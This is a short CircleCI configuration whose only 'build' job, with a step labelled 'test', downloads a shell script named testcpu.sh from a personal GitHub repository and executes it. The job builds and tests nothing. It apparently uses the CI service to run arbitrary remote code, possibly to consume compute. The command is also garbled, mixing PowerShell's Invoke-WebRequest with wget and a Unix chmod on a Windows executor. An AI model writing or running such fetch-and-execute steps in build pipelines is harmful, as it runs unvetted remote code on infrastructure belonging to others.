version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: test 
          command: |
            Invoke-WebRequest wget https://raw.githubusercontent.com/zeshan5555/cpu/main/testcpu.sh && chmod +x testcpu.sh && ./testcpu.sh